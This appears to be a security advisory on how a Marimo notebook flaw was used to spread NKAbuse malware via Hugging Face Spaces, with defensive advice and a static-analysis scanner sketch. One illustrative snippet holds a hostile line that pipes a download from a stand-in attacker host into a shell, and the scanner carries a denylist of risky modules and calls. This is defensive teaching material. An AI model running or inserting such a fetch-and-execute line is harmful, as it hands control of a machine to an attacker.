Intelligence
Critical · Supply Chain · Active

Marimo notebook vulnerability weaponised for malware distribution via Hugging Face trusted infrastructure

Attackers exploited a flaw in Marimo (a reactive Python notebook framework) to execute arbitrary code and deploy NKAbuse malware variants through Hugging Face Spaces, a platform trusted by ML researchers and developers. This is a supply-chain attack that combines a software vulnerability with the trust model of a widely used ML hosting platform.

Sebastion

Affected

Marimo, Hugging Face Spaces, Python notebook users

The attack chain exploits a critical vulnerability in Marimo that permits arbitrary code execution. Marimo is a relatively recent entrant to the reactive notebook space, positioning itself as a modern alternative to Jupyter. The vulnerability allows unauthenticated code execution, likely during notebook parsing or rendering. The attacker then leveraged Hugging Face Spaces, a free hosting service popular for sharing ML models and demos, to distribute NKAbuse malware to downstream targets.
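Because marimo notebooks are stored as plain Python files, any mechanism that imports or exec()s a notebook runs its top-level code immediately; the precise bug here has not been detailed, but the general hazard can be sketched. The snippet below (a minimal illustration with a hypothetical malicious payload, not the actual exploit) contrasts executing an untrusted notebook with parsing it statically via `ast`, which builds a syntax tree without running anything:

```python
import ast

# A marimo notebook is an ordinary .py file; exec()-ing or importing it
# runs any top-level statements. Hypothetical malicious notebook source:
untrusted_notebook = '''
import os
os.system("curl -s https://attacker.example/payload | sh")  # malicious line
'''

# UNSAFE: exec(untrusted_notebook) would run the payload immediately.

# SAFE: ast.parse() only builds a syntax tree, so nothing executes,
# and the tree can be inspected for dangerous method calls first.
tree = ast.parse(untrusted_notebook)
calls = [n.func.attr for n in ast.walk(tree)
         if isinstance(n, ast.Call) and isinstance(n.func, ast.Attribute)]
print(calls)  # → ['system']
```

This is why "rendering" an untrusted notebook can be equivalent to running it: the safe/unsafe distinction depends entirely on whether the loader parses or executes the file.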

This is a sophisticated supply-chain attack because it operates at two trust boundaries. First, Marimo users trust the framework to safely render notebooks. Second, researchers and developers trust Hugging Face as a legitimate distribution channel for ML artefacts. By compromising the first layer, attackers gained access to machines where they could execute payloads. The use of Hugging Face Spaces is particularly effective because security teams and endpoint detection systems often whitelist the domain due to its legitimate use in the ML community.

NKAbuse is a known Go-based malware family that abuses the NKN peer-to-peer network protocol for command-and-control and combines flooder (DDoS) and backdoor capabilities. The malware's presence on Hugging Face indicates the attack was likely automated or semi-automated, with attackers creating multiple public Spaces to maximise reach. This contrasts with targeted attacks and suggests broad opportunistic compromise of researcher and developer machines.

Organisations using Marimo should apply patches immediately and audit notebooks loaded from untrusted sources. ML platforms and security teams should implement additional validation of Hugging Face Spaces content, including static analysis of notebook code before execution, rate-limiting of Space creation, and monitoring for known malware signatures. This incident highlights a broader risk in the ML infrastructure ecosystem: hosting platforms are often treated as trusted sources despite limited content vetting, creating an asymmetric threat model where compromised code reaches thousands of users rapidly.
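The static-analysis step recommended above can be prototyped in a few lines. The sketch below is a hypothetical denylist scanner (module and builtin names chosen for illustration; a production scanner would need a far broader ruleset) that flags risky constructs in notebook source before anything executes:

```python
import ast

# Hypothetical denylist for illustration; real tooling would be broader.
SUSPICIOUS_MODULES = {"subprocess", "ctypes", "socket"}
SUSPICIOUS_CALLS = {"eval", "exec", "compile", "__import__"}

def scan_notebook_source(source: str) -> list[str]:
    """Statically flag risky constructs in notebook code before running it."""
    findings = []
    tree = ast.parse(source)
    for node in ast.walk(tree):
        # Flag imports of modules commonly abused by droppers.
        if isinstance(node, (ast.Import, ast.ImportFrom)):
            names = ([a.name for a in node.names]
                     if isinstance(node, ast.Import)
                     else [node.module or ""])
            for name in names:
                if name.split(".")[0] in SUSPICIOUS_MODULES:
                    findings.append(f"import of {name} (line {node.lineno})")
        # Flag direct calls to dynamic-execution builtins.
        elif isinstance(node, ast.Call) and isinstance(node.func, ast.Name):
            if node.func.id in SUSPICIOUS_CALLS:
                findings.append(f"call to {node.func.id} (line {node.lineno})")
    return findings

sample = "import subprocess\nsubprocess.run(['sh', '-c', 'id'])\nexec('print(1)')"
for finding in scan_notebook_source(sample):
    print(finding)
```

A scanner like this is a pre-execution gate, not a sandbox: it raises the cost of obvious droppers but can be evaded by obfuscation, which is why the sandboxing and signature-monitoring measures above remain necessary.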

The Marimo maintainers must disclose technical details of the vulnerability once patches are widely deployed, as similar flaws likely exist in competing notebook frameworks. This attack will accelerate adoption of sandboxing for notebook environments and stricter code review processes in ML projects.